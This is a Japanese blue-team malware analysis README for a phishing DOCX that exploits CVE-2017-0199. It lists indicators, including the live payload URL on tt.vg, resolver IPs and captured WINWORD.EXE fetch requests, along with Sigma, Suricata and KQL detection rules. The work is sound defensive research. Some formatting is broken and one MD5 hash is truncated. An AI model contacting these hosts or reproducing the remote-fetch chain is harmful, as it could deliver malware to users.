
このリポジトリには、CVE-2017-0199を悪用する実際の悪意のあるDOCXファイルに対する完全なブルーチームのマルウェア解析が含まれています。このラボには、サンドボックス実行、ネットワークフォレンジック、IOC抽出、MITRE ATT&CKマッピング、ドロップファイルのレビュー、および検出ルールが含まれます。エビデンスのスクリーンショットは、プロフェッショナルなドキュメント作成のためにevidenceフォルダ内に含まれています。
高度なマルウェアデトネーション • エクスプロイト動作 • IOC • 検出エンジニアリング
このリポジトリは、**CVE-2017-0199** Microsoft Office RCE脆弱性を悪用する**実際の悪意あるDOCX**ファイルを文書化したものです。 サンプルは**Windows 10 ANY.RUNサンドボックス**内でデトネーションされ、以下が明らかになりました:
✔ 完全なエクスプロイトチェーン
✔ 悪意あるドメイン(tt.vg)へのネットワークコールバック
✔ ドロップされたファイルと一時アーティファクト
✔ JA3フィンガープリント
✔ レジストリ活動
✔ WINWORD.EXEからのHTTP/HTTPSビーコン
✔ 完全なブルーチームIOCと検出ルール
「BankPaymAdviceVend.Report.docx」というタイトルの文書がフィッシングメールで受信されました。
デトネーション後、ANY.RUNは即座に悪意ありと判定し、以下と関連付けました:
tt.vg への接続/BVhaS の取得試行
[ 悪意のあるDOCX ] │ ▼ [ ユーザーがWordで開く ] │ ▼ [ CVE-2017-0199エクスプロイト発動 ] │ ▼ [ WINWORD.EXE → HTTP/HTTPS経由でtt.vgへ接続 ] │ ▼ [ リモートパス: /BVhaS (GET / HEAD / OPTIONS) ] │ ▼ [ 一時ファイル、EMFオブジェクト、キャッシュファイルがドロップされる ] │ ▼ [ 次のステージペイロード — サーバーが404を返す ]
yaml Copy code
悪意のあるドメインは1つのみ:
| ドメイン | レピュテーション |
|---|---|
| tt.vg | 🔴 悪意あり |
解決されたIP:
188.114.96.3 188.114.97.3 172.67.138.42 (TLS v1.2)
yaml Copy code
Wordが取得を試行:
GET /BVhaS HEAD /BVhaS OPTIONS / Host: tt.vg User-Agent: Microsoft Office / MSIE 7 スプーフ
yaml Copy code
典型的なキャプチャされたリクエスト:
GET /BVhaS HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0...) Connection: Keep-Alive Host: tt.vg
arduino Copy code
サーバーの応答:
HTTP/1.1 404 Not Found
yaml Copy code
.tmpファイル.glox グラフィックオブジェクト%LOCALAPPDATA%\INetCache\Content.MSO\*.emf.LNKindex.dat ログWordがアクセスした場所:
HKCU\Software\Microsoft\Office\14.0... HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings... HKLM\System\ControlSet001\Services\Tcpip\Parameters\Interfaces...
yaml Copy code
✔ Officeとしては正常
❌ エクスプロイトとの組み合わせ = 明らかに悪意のある動作
種類: リモートコード実行
トリガー: 悪意のあるDOCXがユーザーの操作なしにリモートHTAを読み込む
影響範囲: Microsoft Word 2007–2016
影響: 攻撃者が任意のコードを実行可能
このサンプルは以下のリモートペイロードの読み込みを試みます:
yaml Copy code
ドメイン: tt.vg
URL: http://tt.vg/BVhaS https://tt.vg/BVhaS
IP: 188.114.96.3 188.114.97.3 172.67.138.42
shell Copy code
091f51a7a1c3a4504a224cc081ce9cee 46f5131e766d248db0248a86c494b71c 65005c9d9ae0f0ebeaf22c210571d482 ...
yaml Copy code
このセクションでは、BankPaymAdviceVend.Report.docxの技術的分析を、SOC や ブルーチーム が即座に展開できる実用的な検出アーティファクトに変換します。 Sigmaルール、Suricata IDSシグネチャ、EDRハンティングクエリが含まれます。
このSigmaルールは、Windowsネットワークログ内で WINWORD.EXE から不審な短縮ドメイン tt.vg へのネットワーク接続を検出します。
title: WINWORD Connecting To Suspicious Short Domain tt.vg
id: 0b2a5f3d-ttvg-word
status: experimental
logsource:
category: network_connection
product: windows
detection:
selection:
Image|endswith: '\WINWORD.EXE'
DestinationHostname: 'tt.vg'
condition: selection
level: high
tags:
- attack.command_and_control
- attack.t1071.001
- cve.2017-0199
💡 WINWORD.EXE を介して tt.vg に接続する古いOfficeシステムは、直ちに調査すべきです。
/BVhaS
Office由来の、悪意あるドメイン tt.vg への GET /BVhaS リクエストを識別するSuricata IDSルール。
エクスプロイトのペイロード取得試行を捕捉します。
alert http $HOME_NET any -> $EXTERNAL_NET any (
msg:"C2 – Office WINWORD GET /BVhaS on tt.vg";
flow:established,to_server;
http.method; content:"GET";
http.uri; content:"/BVhaS"; nocase;
http.host; content:"tt.vg"; nocase;
http.user_agent; content:"MSOffice"; nocase;
reference:cve,2017-0199;
classtype:trojan-activity;
sid:4200010;
rev:1;
)
🔥 Suricata や Zeek を使用してアウトバウンドトラフィックを監視する環境で非常に効果的です。
環境内で、tt.vg または関連IPアドレスへの悪意のあるビーコンを示す可能性のあるマシンを特定するための KQL(Microsoft Defender) ハンティングクエリです。
DeviceNetworkEvents
| where InitiatingProcessFileName == "WINWORD.EXE"
| where RemoteUrl in ("tt.vg")
or RemoteIp in ("188.114.96.3","188.114.97.3","172.67.138.42")
🎯 目的:単一のサンドボックスデトネーションを、**企業全体のハント**に拡大することです。
このラボは、実際のフィッシングDOCXサンプルをエンドツーエンドで分析し、完全なSOCグレードの方法論に従う能力を示しています。
WINWORD.EXE が予期せぬHTTP/Sクライアントになる過程を追跡。言い換えれば — このラボはデトネーションで終わりません。 プロのSOCアナリストのように、実際に実行可能な検出インテリジェンスを抽出します。
設計・文書化:Ahmed Tarek — ブルーチーム
| フィールド | 値 |
|---|
| ファイル | BankPaymAdviceVend.Report.docx |
| 判定 | 悪意のある活動 |
| タグ | cve-2017-0199, exploit |
| MD5 | 22EDED727467A9A26F3FD311A12A7E |
| SHA1 | 6738D1A969193459C7C7579956269D77FED8D26F |
| SHA256 | 2E1408013503C...3D6EAF9 |
| サンドボックス | Windows 10 Pro x64 |
| 動作 | エクスプロイト → ネットワークビーコン → ドロップファイル |